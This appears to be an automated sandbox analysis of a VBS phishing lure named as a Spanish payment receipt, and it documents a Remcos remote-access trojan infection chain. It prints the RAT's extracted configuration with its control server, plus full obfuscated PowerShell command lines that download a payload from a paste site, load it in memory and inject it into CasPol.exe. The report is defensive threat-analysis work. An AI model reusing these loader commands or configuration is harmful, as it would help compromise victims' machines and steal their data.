Analysis
max time kernel: 147s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20220721-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07-08-2022 08:28

Static task: static1
Behavioral task: behavioral1
Sample: DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs
Resource: win7-20220718-en
General
Target: DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs
Size: 205KB
MD5: a922f12891bb10b7fa058b7974950de6
SHA1: 5a7e081ae52a26ebc08b0076493a73afbc58fc9e
SHA256: 4287a4d23b855bf6ce9ff903998b58468c9dbf03255e486cda93f0115957edbf
SHA512: 2d6f4865ccbe9b99113d7568aeeb0e6e6250f9cde87227ea5efc5aaee8aa1758679f02c046c6396feece1c9fd5607415403578bec90583ee4e7aa6a08506b5e3
Malware Config

Extracted
https://pasteio.com/download/xc3Ey7lGXuPW

Extracted
remcos
roda11
nod.con-ip.com:2405
audio_folder: MicRecords
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: true
install_flag: false
keylog_crypt: true
keylog_file: logs.dat
keylog_flag: false
keylog_folder: logs
keylog_path: %AppData%
mouse_option: false
mutex: mcos1017-WJ8SF4
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
startup_value: Remcos
take_screenshot_option: false
take_screenshot_time: 5
Signatures

Blocklisted process makes network request (1 IoCs)
Processes:
  flow | pid  | process
  5    | 3984 | powershell.exe

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
  description       | ioc                                                                                                   | process
  Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | WScript.exe

Drops startup file (2 IoCs)
Processes:
  description                  | ioc                                                                                        | process
  File created                 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\E9O8Nw.vbs | powershell.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\E9O8Nw.vbs | powershell.exe

Suspicious use of SetThreadContext (1 IoCs)
Processes:
  description                           | pid  | process        | target process
  PID 3984 set thread context of 4908   | 3984 | powershell.exe | CasPol.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes:
  pid  | process
  3136 | powershell.exe
  3136 | powershell.exe
  3984 | powershell.exe
  3984 | powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
  description              | pid  | process
  Token: SeDebugPrivilege  | 3136 | powershell.exe
  Token: SeDebugPrivilege  | 3984 | powershell.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
Processes:
  pid  | process
  4908 | CasPol.exe

Suspicious use of WriteProcessMemory (16 IoCs)
Processes:
  description                       | pid  | process        | target process
  PID 4156 wrote to memory of 3136  | 4156 | WScript.exe    | powershell.exe
  PID 4156 wrote to memory of 3136  | 4156 | WScript.exe    | powershell.exe
  PID 3136 wrote to memory of 3984  | 3136 | powershell.exe | powershell.exe
  PID 3136 wrote to memory of 3984  | 3136 | powershell.exe | powershell.exe
  PID 3984 wrote to memory of 4908  | 3984 | powershell.exe | CasPol.exe
  PID 3984 wrote to memory of 4908  | 3984 | powershell.exe | CasPol.exe
  PID 3984 wrote to memory of 4908  | 3984 | powershell.exe | CasPol.exe
  PID 3984 wrote to memory of 4908  | 3984 | powershell.exe | CasPol.exe
  PID 3984 wrote to memory of 4908  | 3984 | powershell.exe | CasPol.exe
  PID 3984 wrote to memory of 4908  | 3984 | powershell.exe | CasPol.exe
  PID 3984 wrote to memory of 4908  | 3984 | powershell.exe | CasPol.exe
  PID 3984 wrote to memory of 4908  | 3984 | powershell.exe | CasPol.exe
  PID 3984 wrote to memory of 4908  | 3984 | powershell.exe | CasPol.exe
  PID 3984 wrote to memory of 4908  | 3984 | powershell.exe | CasPol.exe
  PID 3984 wrote to memory of 4908  | 3984 | powershell.exe | CasPol.exe
  PID 3984 wrote to memory of 4908  | 3984 | powershell.exe | CasPol.exe
Processes (process tree; the number in brackets is the depth at which each process was spawned)

- [1] C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs"
  Signatures:
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAE8ASQBVAEcAdwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AG⌚⌚⌚AaQBvAC4AYwBvAG0ALwBkAG8AdwBuAGwAbwBhAGQALwB4AGMAMwBFAHkANwBsAEcAWAB1AFAAVwAnACkAKQA7AFsAcwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⌚⌚⌚AcgByAG⌚⌚⌚AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⌚⌚⌚AKAAnAE4AdwBnAG8AeABNAC4ASwBQAEoAYQBOAGoAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFAAVQBsAEcASwBBACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⌚⌚⌚AbABsACwAIABbAG8AYgBqAG⌚⌚⌚AYwB0AFsAXQBdACAAKAAnAHcATgA4AE8AOQBFAGQAOQBxAFAA⌚⌚⌚gB4AC8AZABhAG8AbABuAHcAbwBkAC8AbQBvAGMALgBvAGkAZQB0AHMAYQBwAC8ALwA6AHMAcAB0AHQAaAAnACAALAAgACQA⌚⌚⌚gBvAGQAYQBDAG8AcAB5ACAALAAgACcARQA5AE8AOABOAHcAJwAgACkAKQA=';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%OIUGw%', 'C:\Users\Admin\AppData\Local\Temp\DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
    Signatures:
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xc3Ey7lGXuPW'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('wN8O9Ed9qPRx/daolnwod/moc.oietsap//:sptth' , $RodaCopy , 'E9O8Nw' ))"
      Signatures:
      - Blocklisted process makes network request
      - Drops startup file
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      - [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        Signatures:
        - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: f41839a3fe2888c8b3050197bc9a0a05
  SHA1: 0798941aaf7a53a11ea9ed589752890aee069729
  SHA256: 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
  SHA512: 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 64B
  MD5: 23909774a4f0358be8e03226d73fbd61
  SHA1: 4df262994ce4eb3935965881c1e2dc730668da94
  SHA256: 6dbd177f5aa34f836bf52885c04a3a93771384ebad954911be812c039290bcad
  SHA512: 6ed0bfd0a498043cccf9ef2d9bebc869c4f5f2befc90636e2e3167b2d0b694c538f93aaeefe221bc08ca3962c6499f402df4934444c9f82883d3314075d5f05b

memory/3136-131-0x0000024ACB470000-0x0000024ACB492000-memory.dmp
  Filesize: 136KB

memory/3136-132-0x00007FFE170F0000-0x00007FFE17BB1000-memory.dmp
  Filesize: 10.8MB

memory/3136-142-0x00007FFE170F0000-0x00007FFE17BB1000-memory.dmp
  Filesize: 10.8MB

memory/3136-130-0x0000000000000000-mapping.dmp

memory/3984-133-0x0000000000000000-mapping.dmp

memory/3984-134-0x00007FFE170F0000-0x00007FFE17BB1000-memory.dmp
  Filesize: 10.8MB

memory/3984-138-0x00007FFE170F0000-0x00007FFE17BB1000-memory.dmp
  Filesize: 10.8MB

memory/4908-136-0x000000000043168C-mapping.dmp

memory/4908-139-0x0000000000400000-0x000000000047E000-memory.dmp
  Filesize: 504KB

memory/4908-137-0x0000000000400000-0x000000000047E000-memory.dmp
  Filesize: 504KB

memory/4908-135-0x0000000000400000-0x000000000047E000-memory.dmp
  Filesize: 504KB

memory/4908-143-0x0000000000400000-0x000000000047E000-memory.dmp
  Filesize: 504KB

memory/4908-144-0x0000000000400000-0x000000000047E000-memory.dmp
  Filesize: 504KB